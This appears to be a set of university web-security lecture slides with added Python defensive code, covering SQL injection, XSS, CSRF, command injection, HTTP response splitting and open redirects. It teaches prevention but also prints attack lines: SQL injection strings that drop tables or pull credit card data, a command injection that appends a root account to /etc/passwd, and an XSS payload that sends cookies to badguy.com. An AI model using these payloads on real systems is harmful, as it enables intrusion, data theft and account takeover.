Chapter 8 - Web Security

The document discusses secure web site design, focusing on ethical hacking practices and common vulnerabilities such as SQL injection and cross-site scripting (XSS). It highlights the importance of secure coding practices and outlines the OWASP Top 10 Security Vulnerabilities, emphasizing the need for input validation and proper error handling. Additionally, it provides examples of SQL injection attacks and their potential consequences.

CS 155 Spring 2008

Secure Web Site Design

Collected Material

Ethics
• Only hack into sites you own
– Or you have permission
• Popular sites may have bug bounty program
– Facebook
– github
– Google
• You will get caught
Tech
• HTTP
• HTML
• CSS
• JavaScript
• SQL
• Server-Side Code (Python/PHP/Ruby)
Many Vulnerabilities
• Cross-Site Scripting (XSS)
• SQL Injection
• Cross-Site Request Forgery (XSRF)
• HTTP Parameter Pollution (HPP)
• Command Injection
• Parameter Manipulation
• File Exposure
• Directory Traversal
• Forced Browsing
• Logic Flaws
• Execution After Redirect (EAR)
HTML
• Original HTML had
– images
– tables
– font sizes
–…
• Content was static
https://web.archive.org/web/19961017235908/http://www2.yahoo.com/
https://web.archive.org/web/19961022174810/http://www.altavista.com/
https://web.archive.org/web/19981202230410/http://www.google.com/
HTML Design
• HTML designed to describe a text document with hyperlinks to other documents
• How to do fancy animations or pretty web pages?
Interactive HTML
• Java Applets
– Your computer downloads Java bytecode from a random website and runs it
• What could possibly go wrong?
• ActiveX Controls
– Binary, OS-specific programs that are downloaded and executed in the context of a web page
• Adobe Flash
– Fundamentally a vector graphics and animation engine
• Silverlight
– Microsoft competitor and replacement/upgrade to ActiveX
• JavaScript
– Lingua franca of the web
JavaScript
• Code can be embedded into HTML pages using the script element (optionally wrapping the code in an HTML comment, as older pages did)
<script>
<!--
var name = prompt('Please enter your name below.', '');
if (name == null) {
  document.write('Welcome to my site!');
}
else {
  document.write('Welcome to my site ' + name + '!');
}
-->
</script>

• Alternative forms of the opening tag also seen in the wild:
<script type="text/javascript">
<script language="javascript">
DOM Example
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>DOM Example</title>
</head>
<body>
<h1>DOM Example</h1>
<div id='insert_here'>
</div>
</body>
<script>
var hr = document.createElement('HR');

document.getElementById('insert_here').appendChild(hr);
</script>
</html>
Web Applications
(diagram: browser running JavaScript, HTTP between browser and web server, SQL between web server and database)
HTTP Client Request
GET / HTTP/1.1
User-Agent: curl/7.37.1
Host: www.facebook.com
Accept: */*
HTTP Server Response
HTTP/1.1 200 OK
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Set-Cookie: datr=cohyVEAwQmq5jJh2cWZ9pZc9; expires=Wed, 23-Nov-2016 01:22:58 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
<head>
<script>
...
</script>
<title id="pageTitle">Welcome to Facebook - Log In, Sign Up or Learn More</title>
JavaScript Security
• Browsers are downloading and running foreign (JavaScript) code, sometimes concurrently
• The security of JavaScript code execution is guaranteed by a sandboxing mechanism (similar to what we saw in Java applets)
– No access to local files
– No access to (most) network resources
– No incredibly small windows
– No access to the browser's history
– …
• The details of the sandbox depend on the browser
Web application code
Runs on web server or app server.
• Takes input from web users (via web server)
• Interacts with the database and 3rd parties.
• Prepares results for users (via web server)

Examples:
• Shopping carts, home banking, bill pay, tax prep, …
• New code written for every web site.

Written in:
• C, PHP, Perl, Python, JSP, ASP, …
• Often written with little consideration for security
Common vulnerabilities
SANS Top 10:
SQL Injection
• Browser sends malicious input to server
• Bad input checking leads to malicious SQL query

XSS – Cross-site scripting
• Bad web site sends innocent victim a script that steals information from an honest web site

CSRF – Cross-site request forgery
• Bad web site sends request to good web site, using credentials of an innocent victim who "visits" site

Other problems
• HTTP response splitting, site redirects, …
OWASP Top 10 Security Vulnerabilities
• 1 - Cross Site Scripting (XSS) XSS flaws occur whenever an application takes user supplied data and sends it to a web
browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's
browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
• 2 - Injection Flaws Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when
user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the
interpreter into executing unintended commands or changing data.
• 3 - Malicious File Execution Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and
data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP,
XML and any framework which accepts filenames or files from users.
• 4 - Insecure Direct Object Reference A direct object reference occurs when a developer exposes a reference to an
internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter.
Attackers can manipulate those references to access other objects without authorization.
• 5 - Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim's browser to send a pre-authenticated
request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the
benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
• 6 - Information Leakage and Improper Error Handling Applications can unintentionally leak information about their
configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this
weakness to steal sensitive data, or conduct more serious attacks.
• 7 - Broken Authentication and Session Management Account credentials and session tokens are often not properly
protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.
• 8 - Insecure Cryptographic Storage Web applications rarely use cryptographic functions properly to protect data and
credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.
• 9 - Insecure Communications Applications frequently fail to encrypt network traffic when it is necessary to protect
sensitive communications.
• 10 - Failure to Restrict URL Access Frequently, an application only protects sensitive functionality by preventing the
display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized
operations by accessing those URLs directly.

OWASP Top 2: Injection Flaws (SQL Injection)

– What is SQL Injection
• SQL injection is the actual injection of SQL commands into web applications through user input fields.
• When an application uses internal SQL commands and you also have user input capabilities (like a login screen), SQL commands can be injected that can create, read, update, or delete any data available to the application.
– Prevention
• You can put tight constraints on user inputs. But the best method of preventing SQL injection is to avoid the use of dynamically generated SQL in your code. Instead use stored or canned procedures.
• And then again, run a scan to make sure your application is not vulnerable to SQL injections.
SQL Injection

with many slides from Neil Daswani

Dynamic Web Application
(diagram: the Browser sends "GET / HTTP/1.0" to the Web server, which runs index.php and talks to the Database server; the Web server replies "HTTP/1.1 200 OK")
PHP: Hypertext Preprocessor
Server scripting language with C-like syntax
Can intermingle static HTML and code
<input value=<?php echo $myvalue; ?>>
Can embed variables in double-quote strings
$user = "world"; echo "Hello $user!";
or $user = "world"; echo "Hello " . $user . "!";
Form data in global arrays $_GET, $_POST, …
SQL
Widely used database query language
Fetch a set of records
SELECT * FROM Person WHERE Username='grader'
Add data to the table
INSERT INTO Person (Username, Zoobars) VALUES ('grader', 10)
Modify data
UPDATE Person SET Zoobars=42 WHERE PersonID=5
Query syntax (mostly) independent of
In context of project 2 …
Sample PHP
$recipient = $_POST['recipient'];
$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
$rs = $db->executeQuery($sql);
Problem
• What if 'recipient' is a malicious string that changes the meaning of the query?
Basic picture: SQL Injection
(diagram: 1. the Attacker posts a malicious form to the Victim Server; 2. the Victim Server sends an unintended query to the Victim SQL DB; 3. the Attacker receives valuable data)
CardSystems Attack
CardSystems
• credit card payment processing company
• SQL injection attack in June 2005
• put out of business

The Attack
• 263,000 credit card #s stolen from database
• credit card #s stored unencrypted
• 43 million credit card #s exposed
April 2008 SQL Vulnerabilities
Main steps in this attack
(1) Use Google to find sites using a particular ASP style vulnerable to SQL injection
(2) Use SQL injection on these sites to modify the page to include a link to a Chinese site nihaorr1.com
Don't visit that site yourself!
(3) The site (nihaorr1.com) serves Javascript that exploits vulnerabilities in IE, RealPlayer, QQ Instant Messenger

Steps (1) and (2) are automated in a tool that can be configured to inject whatever you like into vulnerable sites
There is some evidence that hackers may get paid for each visit to nihaorr1.com
Part of the SQL attack string
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and
  (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+'‘ ''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(%20AS%20NVARCHAR(4000));EXEC(@S);--
SQL Injection Examples
Type 1 Attack Example
(diagram: the Web Browser (Client) sends the entered Username & Password to the Web Server, which sends the DB the query below)
SELECT passwd FROM USERS WHERE uname IS '$username'

Normal Query (username smith):
SELECT passwd FROM USERS WHERE uname IS 'smith'

Attacker Modifies Input
Malicious Query (username '; DROP TABLE USERS; -- ):
SELECT passwd FROM USERS WHERE uname IS ''; DROP TABLE USERS; -- '
Eliminates all user accounts
What is SQL Injection?
Input Validation Vulnerability
• untrusted user input in SQL query to back-end database
• without sanitizing the data

Specific case of more general command injection
• inserting untrusted input into a query or command

Why Bad?
• supplied data can be misinterpreted as a command
• could alter the intended effect of command or query
SQL Injection Examples

View pizza order history:<br>
<form method="post" action="...">
Month
<select name="month">
<option value="1">Jan</option>
...
<option value="12">Dec</option>
</select>
Year
<p>
<input type=submit name=submit value=View>
</form>

Attacker can post form that is not generated by this page.
SQL Injection Examples
Normal SQL Query:
SELECT pizza, toppings, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=10

Type 2 Attack: for the order_month parameter, attacker could input
0 OR 1=1

Malicious Query:
… WHERE userid=4123
AND order_month=0 OR 1=1

WHERE condition is always true! Gives attacker access to other users' private data!
SQL Injection Examples
All User Data Compromised
SQL Injection Examples
A more damaging breach of user privacy:
For order_month parameter, attacker could input
0 AND 1=0
UNION SELECT cardholder, number, exp_month, exp_year
FROM creditcards

Attacker is able to
• Combine the results of two queries
• Empty table from first query with the sensitive credit card info of all users from second query
SQL Injection Examples
Credit Card Info Compromised
More Attacks
• Create new users:
'; INSERT INTO USERS ('uname','passwd','salt') VALUES ('hacker','38a74f', 3234);

• Password reset:
'; UPDATE USERS SET [email protected] WHERE [email protected]
Second-Order SQL Injection
Second-Order SQL Injection: attack where data stored in database is later used to conduct SQL injection

Example: this vulnerability could exist if string escaping is applied inconsistently

Solution: Treat ALL parameters as dangerous

UPDATE USERS SET passwd='cracked' WHERE uname='admin' --'
(attacker chooses the username admin' -- )
Strings not escaped!
Preventing SQL Injection
Input validation
• Filter
– Apostrophes, semicolons, percent symbols, hyphens, underscores, …
– Any character that has special meanings
• Check the data type (e.g., make sure it's an integer)

Whitelisting
• Blacklisting chars doesn't work
– forget to filter out some characters
– could prevent valid input (e.g. username O'Brien)
• Allow only well-defined set of safe values
– Set implicitly defined through regular expressions

Escaping Quotes
For valid string inputs like username o'connor, use escape characters
• Ex: escape(o'connor) = o''connor
• only works for string inputs
Prepared Statements
Metacharacters (e.g. ') in queries provide distinction between data & control
Most attacks: data interpreted as control / alters the semantics of a query/cmd
Bind Variables: ? placeholders guaranteed to be data (not control)
Prepared Statements allow creation of static queries with bind variables → preserves the structure of intended query
Prepared Statement: Example

PreparedStatement ps =
    db.prepareStatement("SELECT pizza, toppings, quantity, order_day "
        + "FROM orders WHERE userid=? AND order_month=?");
ps.setInt(1, session.getCurrentUserId());
ps.setInt(2, Integer.parseInt(request.getParameter("month")));
ResultSet res = ps.executeQuery();

Bind Variable: Data Placeholder (the ? in the query)
• query parsed w/o parameters
• bind variables are typed e.g. int, string, etc…
Parameterized SQL
Build SQL queries by properly escaping args: ' → \'

Example: Parameterized SQL (ASP.NET 1.1)
• Ensures SQL arguments are properly escaped.

SqlCommand cmd = new SqlCommand(
    "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd",
    dbConnection);
cmd.Parameters.Add("@User", Request["user"]);
cmd.Parameters.Add("@Pwd", Request["pwd"]);
cmd.ExecuteReader();
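To make the Type 1 and Type 2 examples and the defenses above concrete, here is an added example (not from the course slides or project) in Python with the standard sqlite3 module: constructed orders, creditcards and users tables, the string-pasting query beside its bind-variable version with the whitelist month check, and the o'connor-style quote escaping for the login lookup. All table names, rows and function names are assumptions of this example.

```python
import sqlite3

# Constructed sample rows (not the course's data): orders for two users, one
# card row, and two accounts. Column order follows the CREATE TABLE statements.
SAMPLE_ORDERS = [
    (4123, "margherita", "basil", 1, 3, 10),
    (4123, "pepperoni", "extra cheese", 2, 9, 11),
    (7001, "hawaiian", "pineapple", 1, 17, 10),
]
SAMPLE_USERS = [("smith", "s3cret"), ("o'connor", "hunter2")]


def make_db():
    """Build an in-memory database with the constructed tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE orders (userid INTEGER, pizza TEXT, toppings TEXT, "
               "quantity INTEGER, order_day INTEGER, order_month INTEGER)")
    db.executemany("INSERT INTO orders VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ORDERS)
    db.execute("CREATE TABLE creditcards (cardholder TEXT, number TEXT, "
               "exp_month INTEGER, exp_year INTEGER)")
    db.execute("INSERT INTO creditcards VALUES ('J. Smith', '4111-0000-0000-0000', 6, 2030)")
    db.execute("CREATE TABLE users (uname TEXT, passwd TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return db


# --- Type 2 (order history): dynamic SQL versus bind variables ---------------

def orders_dynamic_sql(db, userid, month):
    """The vulnerable pattern: the month parameter is pasted into the query text,
    so input such as '0 OR 1=1' or '0 AND 1=0 UNION SELECT ...' rewrites the query."""
    sql = ("SELECT pizza, toppings, quantity, order_day FROM orders "
           f"WHERE userid={userid} AND order_month={month}")
    return db.execute(sql).fetchall()


def validate_month(value):
    """Whitelist check: accept only a string of digits naming a month 1..12."""
    if not (isinstance(value, str) and value.isdigit()):
        raise ValueError("month must contain digits only")
    month = int(value)
    if not 1 <= month <= 12:
        raise ValueError("month out of range")
    return month


def orders_bound(db, userid, month):
    """Hardened form: a validated, typed value bound to a '?' placeholder.
    The query structure is fixed before any user data is seen."""
    sql = ("SELECT pizza, toppings, quantity, order_day FROM orders "
           "WHERE userid=? AND order_month=?")
    return db.execute(sql, (userid, validate_month(month))).fetchall()


# --- Type 1 (login lookup): quote escaping for string inputs -----------------

def escape_sql_string(text):
    """escape(o'connor) = o''connor: doubling the apostrophe keeps it inside the
    literal. Only meaningful for string inputs; numbers need a type check instead."""
    return text.replace("'", "''")


def passwd_dynamic(db, username):
    """Vulnerable lookup from the slides: SELECT passwd ... WHERE uname='$username'.
    A legitimate o'connor breaks the query; a quote-closing input rewrites it."""
    return db.execute(f"SELECT passwd FROM users WHERE uname='{username}'").fetchall()


def passwd_escaped(db, username):
    """Same query with the apostrophe escaped before interpolation."""
    return db.execute(
        f"SELECT passwd FROM users WHERE uname='{escape_sql_string(username)}'").fetchall()
```

sqlite3's execute() runs a single statement, so the '; DROP TABLE form cannot be reproduced here; the tautology and UNION forms can.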
Mitigating Impacts
• Prevent Schema & Information Leaks
• Limit Privileges (Defense-in-Depth)
• Encrypt Sensitive Data stored in Database
• Harden DB Server and Host OS
• Apply Input Validation
Other command injection
Example: PHP server-side code for sending email
$email = $_POST["email"];
$subject = $_POST["subject"];
system("mail $email -s $subject < /tmp/joinmynetwork");

Attacker can post
http://yourdomain.com/mail.pl?[email protected]&subject=foo < /usr/passwd; ls

OR
http://yourdomain.com/mail.pl?[email protected]&subject=foo; echo "evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
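An added example (not the course's code) in Python showing why the mail snippet above is dangerous and how the argument-vector form avoids it: shell_command_line reproduces the string the PHP system() call hands to the shell, count_commands tokenises it the way a POSIX shell would, and build_mail_argv is the hardened form that validates the address and passes the subject as one argument with no shell involved. The address pattern, the constructed addresses and the use of "--" before the recipient are assumptions of this example; the mail binary is not invoked.

```python
import re
import shlex

# Addresses in the slides are redacted; this strict pattern is an assumption of this example.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")
SHELL_SEPARATORS = {";", "|", "||", "&", "&&"}


def shell_command_line(email, subject):
    """The vulnerable pattern transcribed from the PHP slide: one string for the shell."""
    return f"mail {email} -s {subject} < /tmp/joinmynetwork"


def count_commands(command_line):
    """Count how many commands a POSIX shell would run for this string.
    shlex with punctuation_chars splits ';', '|', '&', '<' and '>' into their own
    tokens, so every separator in the injected subject becomes visible."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    separators = sum(1 for token in lexer if token in SHELL_SEPARATORS)
    return separators + 1


def build_mail_argv(email, subject):
    """Hardened form: validate the address, reject multi-line subjects, and return an
    argument vector for subprocess.run(argv) (no shell), so ';', '<' and '>' in the
    subject stay inside a single argument and are never interpreted."""
    if not EMAIL_RE.match(email):
        raise ValueError("invalid e-mail address")
    if "\n" in subject or "\r" in subject:
        raise ValueError("subject must be a single line")
    # '--' ends option parsing (assumed for the local mail command) so an address
    # that starts with '-' cannot be read as a flag.
    return ["mail", "-s", subject, "--", email]
```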
Cross Site Scripting (XSS)
OWASP Top 1: Cross Site Scripting
– What is Cross Site Scripting?
• In its simplest form, it's a process that can occur anywhere a web application uses input from a malicious user to generate output without validating or encoding the input.
• During a Cross Site Scripting attack, a malicious source sends a script that is executed by the end user's browser. It allows attackers to embed code from one webpage into another webpage by changing its HTML code.
• It's been used to deface web sites, conduct phishing attacks, or it can take over a user's browser and force them to execute commands they're unaware of.
• Cross Site Scripting attacks usually come in the form of JavaScript; however, any active content poses a potential danger.
– Prevention
• Validate the user's input against what is expected
• Encode user-supplied output
• After you believe you've done the right things during code development, inspect your code with a scan.
Basic picture: Cross-site scripting
(diagram: 1. the User Victim visits the Attack Server's web site; 2. receives a malicious page; 3. clicks on a link to the Server Victim; 4. the Server Victim echoes the user input; 5. the browser sends valuable data to the Attack Server)
The setup
User input is echoed into HTML response.

Example: search field
• http://victim.com/search.php?term=apple
• search.php responds with:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET['term'] ?> :
. . .
</BODY> </HTML>

Is this exploitable?
Bad input
Consider link: (properly URL encoded)
http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>
What if user clicks on this link?
1. Browser goes to victim.com/search.php
2. Victim.com returns
<HTML> Results for <script> … </script>
3. Browser executes script:
Sends badguy.com cookie for victim.com
So what?
Why would user click on such a link?
• Phishing email in webmail client (e.g. gmail).
• Link in doubleclick banner ad
… many many ways to fool user into clicking

What if badguy.com gets cookie for victim.com?
• Cookie can include session auth for victim.com
• Or other data intended only for victim.com
• Violates same origin policy
Much worse …
Attacker can execute arbitrary scripts in browser

Can manipulate any DOM component on victim.com
• Control links on page
• Control form fields (e.g. password field) on this page and linked pages.
• Example: MySpace.com phishing attack injects password field that sends password to bad guy.

Can infect other users: MySpace.com worm.


MySpace.com (Samy worm)

Users can post HTML on their pages
• MySpace.com ensures HTML contains no <script>, <body>, onclick, <a href=javascript://>
• … but can do Javascript within CSS tags:
<div style="background:url('javascript:alert(1)')">
And can hide "javascript" as "java\nscript"

With careful javascript hacking:
• Samy's worm: infects anyone who visits an infected MySpace page … and adds Samy as a friend.
• http://namb.la/popular/tech.html
Samy had millions of friends within 24 hours.
Defenses needed at server
(same diagram as the basic cross-site scripting picture above; the defenses belong at the Server Victim, where user input is echoed)
Avoiding XSS bugs (PHP)

Main problem:
• Input checking is difficult --- many ways to inject scripts into HTML.

Preprocess input from user before echoing it
PHP: htmlspecialchars(string)
& → &amp;   " → &quot;   ' → &#039;   < → &lt;   > → &gt;

• htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
Outputs:
&lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
Avoiding XSS bugs (ASP.NET)

ASP.NET 1.1:
• Server.HtmlEncode(string)
– Similar to PHP htmlspecialchars
• validateRequest: (on by default)
– Crashes page if finds <script> in POST data.
– Looks for hardcoded list of patterns.
– Can be disabled:
<%@ Page validateRequest="false" %>
httpOnly Cookies (IE)

(diagram: the Browser sends "GET …" to the Server; the Server replies with the HTTP header "Set-cookie: NAME=VALUE; HttpOnly")

• Cookie sent over HTTP(s), but not accessible to scripts
• cannot be read via document.cookie
• Helps prevent cookie theft via XSS

… but does not stop most other risks of XSS bugs.
Cross-Site Scripting (XSS)
• XSS attacks are used to bypass
JavaScript's Same Origin Policy
XSS – Example
Page source (test.php):
<html>
<body>
<p>Hello <?= $name ?></p>
</body>
</html>

Request:
http://example.com/test.php?name=adam
Response:
<html>
<body>
<p>Hello adam</p>
</body>
</html>

Request:
http://example.com/test.php?name=<script>alert('xss')</script>
Response:
<html>
<body>
<p>Hello
<script>alert('xss')</script>
</p>
</body>
</html>
XSS – Prevention
• XSS is very difficult to prevent
• Every piece of data that is returned to the user and that can be influenced by the inputs to the application must first be sanitized (GET parameters, POST parameters, Cookies, request headers, database contents, file contents)
• Specific languages (e.g., PHP) often provide routines to prevent the introduction of code
– Sanitization has to be performed differently depending on where the data is used
– This context-sensitivity of sanitization has been studied by the research community
XSS – Prevention
• Sanitize all user inputs using known sanitization routine
• Depends on where output is in HTML page
– < and > necessary in HTML
– Only need ' in JavaScript
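As an added example (not from the slides), the htmlspecialchars mapping and the context-sensitivity point above in Python: a re-implementation of the ENT_QUOTES entity table, a JavaScript-string-literal encoder for the script context, and the test.php greeting rendered with the right encoder for each place the name lands. The quoted-attribute case is included because the PHP form <input value=<?php echo $myvalue; ?>> earlier in the deck leaves the value unquoted. The render_* functions and their templates are assumptions of this example.

```python
import json

# PHP htmlspecialchars() with ENT_QUOTES, re-implemented here (not PHP's own code):
# exactly the five characters and entities listed on the slide.
HTML_ENTITIES = {"&": "&amp;", '"': "&quot;", "'": "&#039;", "<": "&lt;", ">": "&gt;"}


def html_escape(text):
    """Encoder for element content (<p>Hello ...</p>) and for quoted attribute values."""
    return "".join(HTML_ENTITIES.get(ch, ch) for ch in text)


def js_string_literal(text):
    """Encoder for data placed inside a JavaScript string in a <script> block.
    A JSON string literal escapes quotes, backslashes and line terminators; '<' and
    '>' are encoded as well so the data can never contain a '</script>' that ends
    the block early."""
    return json.dumps(text).replace("<", "\\u003c").replace(">", "\\u003e")


def render_greeting(name):
    """The slides' test.php page with the HTML encoder applied to the element content."""
    return f"<html><body><p>Hello {html_escape(name)}</p></body></html>"


def render_greeting_script(name):
    """The same name handed to a script. The HTML encoder would be the wrong choice
    here, because entities are not decoded inside <script>; a JS literal is needed."""
    return f"<script>var name = {js_string_literal(name)}; greet(name);</script>"


def render_input_unquoted(value):
    """The deck's PHP form: <input value=<?php echo $myvalue; ?>>. Even an HTML-encoded
    value may contain a space, which starts a new attribute in an unquoted context."""
    return f"<input value={html_escape(value)}>"


def render_input(value):
    """Corrected form: always quote the attribute; then the same encoder is sufficient."""
    return f'<input value="{html_escape(value)}">'
```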
Cross Site Request Forgery
Basic picture
(diagram: 1. the User Victim establishes a session with the Server Victim; 2. visits the Attack Server; 3. receives a malicious page; 4. the browser sends a forged request to the Server Victim)

Q: how long do you stay logged on to Gmail?
Recall: session using cookies
(diagram: the Browser sends "POST /login.cgi"; the Server replies "Set-cookie: authenticator"; the Browser later sends "GET …" with "Cookie: authenticator"; the Server sends the response)

Reflected XSS
(diagram: the JavaScript arrives in the request http://example.com/test.php?name=… over HTTP and is echoed straight back into the page)

Stored XSS
(diagram: the JavaScript arrives via http://example.com/test.php?title=…, is written to the database over SQL, and is served back later)
Exploits – Phishing
• Malicious JavaScript can completely control the DOM
• Change current page to login page where the login sends credentials to the attacker
Exploits – Session Theft
• HTTP is session-less
– No HTTP-native way to tie requests to the
same user
• Web applications typically use cookies to
create a session
– Session describes who the user is, if they’ve
passed authentication
• JavaScript has access to cookies…
Exploits – Session Theft
(diagram: the web application picture again, with JavaScript and HTTP highlighted)
Exploits – Unauthorized Actions
• JavaScript can make requests to the web
application
– Browser sends cookies
– Appears as if the user made the request
(clicked the link or filled out the form)
• Malicious JavaScript can make requests to
the web application on your behalf
Exploits – Worms
• Stored XSS vulnerability + Unauthorized Actions
– Self-propagating worm
• Social networks particularly susceptible
– "samy is my hero" (2005)
– Tweetdeck (2014)
http://samy.pl/popular/
Cross Site Request Forgery (XSRF)
Example:
• User logs in to bank.com. Does not sign off.
• Session cookie remains in browser state
• Then user visits another site containing:
<form name=F action=http://bank.com/BillPay.php>
<input name=recipient value=badguy> …
<script> document.F.submit(); </script>
• Browser sends user auth cookie with request
• Transaction will be fulfilled

Problem:
• cookie auth is insufficient when side effects can
Another example: Home Routers [SRJ'07]
Fact:
• 50% of home users use a broadband router with a default or no password
Drive-by Pharming attack: User visits malicious site
• JavaScript at site scans home network looking for broadband router:
– SOP allows "send only" messages
– Detect success using onerror:
<IMG SRC=192.168.0.1 onError = do() >
• Once found, login to router and change DNS server
Problem: "send-only" access is sufficient to reprogram router
CSRF Defenses
Secret token
• Place nonce in page/form from honest site
• Check nonce in POST
• Confirm part of ongoing session with server
• Token in POST can be HMAC of session ID in cookie
Check referer (sic) header
• Referer header is provided by browser, not script
• Unfortunately, often filtered for privacy reasons
Use custom headers via XMLHttpRequest
• This requires global change in server apps
Login CSRF
Referer header filtering
CSRF Recommendations
Login CSRF
• Strict Referer validation
• Login forms typically submit over HTTPS, not blocked
HTTPS sites, such as banking sites
• Use strict Referer validation to protect against CSRF
Other
• Use Ruby-on-Rails or other framework that implements secret token method correctly
Future
• Alternative to Referer with fewer privacy problems
• Send only on POST, send only necessary data
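An added example (not the course's or any framework's code) of the secret-token and Referer defenses above in Python: the form token is an HMAC of the session ID from the cookie, checked in constant time on POST, and the Referer check can be strict (reject when missing, as recommended for login forms and HTTPS sites) or lenient (tolerate the privacy filtering mentioned above). The secret value, session IDs and host names are constructed for the example.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed for this example: a real deployment loads a random secret from configuration.
SERVER_SECRET = b"constructed-demo-secret-not-for-real-use"


def csrf_token(session_id, secret=SERVER_SECRET):
    """Nonce to embed in the honest site's form: HMAC-SHA256 of the session ID in the
    cookie. No server-side table is needed; the token is recomputable from the cookie."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(session_id, submitted, secret=SERVER_SECRET):
    """Check the nonce in the POST against the session, in constant time."""
    if not isinstance(submitted, str) or not submitted.isascii():
        return False
    return hmac.compare_digest(csrf_token(session_id, secret), submitted)


def referer_allowed(referer, site_host, strict):
    """Referer is set by the browser, not by script. Strict mode rejects a missing
    header (login forms, HTTPS sites); lenient mode tolerates absence, since the
    header is often filtered, but still rejects a foreign origin."""
    if not referer:
        return not strict
    parts = urlsplit(referer)
    return parts.scheme == "https" and parts.hostname == site_host


def accept_post(cookies, form, headers, site_host, strict_referer):
    """Decision for a state-changing POST such as BillPay.php. A forged cross-site
    form arrives with the victim's session cookie but with neither a valid token
    (the attacker cannot read the cookie to compute it) nor a matching Referer."""
    session_id = cookies.get("session")
    if not session_id:
        return False
    if not token_valid(session_id, form.get("csrf_token")):
        return False
    return referer_allowed(headers.get("Referer"), site_host, strict_referer)
```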
More server-side problems
HTTP Response Splitting
Site Redirects
HTTP Response Splitting: The setup
User input echoed in HTTP header.

Example: Language redirect page (JSP)
<% response.redirect("/by_lang.jsp?lang=" + request.getParameter("lang")) %>

Browser sends http://.../by_lang.jsp?lang=french

Server HTTP Response:
HTTP/1.1 302 (redirect)
Date: …
Location: /by_lang.jsp?lang=french

Is this exploitable?
Bad input

Suppose browser sends:
http://.../by_lang.jsp?lang=
  "french \n
  Content-length: 0 \r\n\r\n
  HTTP/1.1 200 OK
  Spoofed page" (URL encoded)
Bad input
HTTP response from server looks like:

HTTP/1.1 302 (redirect)
Date: …
Location: /by_lang.jsp?lang=french
Content-length: 0

HTTP/1.1 200 OK
Content-length: 217

Spoofed page
So what?
What just happened:
• Attacker submitted bad URL to victim.com
• URL contained spoofed page in it
• Got back spoofed page

So what?
• Cache servers along path now store spoof of victim.com
• Will fool any user using same cache server

Defense: don't do that (use URL encoding…)
Redirects
EZShopper.com shopping cart (10/2004):
http://…/cgi-bin/loadpage.cgi?page=url
• Redirects browser to url

Redirects are common on many sites
• Used to track when user clicks on external link
• EZShopper uses redirect to add HTTP headers

Problem: phishing
http://victim.com/cgi-bin/loadpage?page=phisher.com
• Link to victim.com puts user at phisher.com
• Local redirects should ensure target URL is local
Sample phishing email
How does this lead to spoof page?

Link displayed
• https://www.start.earthlink.net/track?billing.asp
Actual link in html email source
• https://start.earthlink.net/track?id=101fe84398a866372f999c983d8973e77438a993847183bca43d7ad47e99219a907871c773400b8328898787762c&url=http://202.69.39.30/snkee/billing.htm?session_id=8495...
Website resolved to
• http://202.69.39.30/snkee/billing.htm?session_id=8495...
Additional solutions
Web Application Firewalls
Help prevent some attacks we discuss today:
• Cross site scripting
• SQL Injection
• Form field tampering
• Cookie poisoning
Sample products:
• Imperva
• Kavado Interdo
• F5 TrafficShield
• Citrix NetScaler
• CheckPoint Web Intel
Code checking
Blackbox security testing services:
• Whitehatsec.com

Automated blackbox testing tools:
• Cenzic, Hailstorm
• Spidynamic, WebInspect
• eEye, Retina

Web application hardening tools:
• WebSSARI [WWW'04]: based on information flow
• Nguyen-Tuong [IFIP'05]: based on tainting
OWASP Top 3: Malicious File Execution
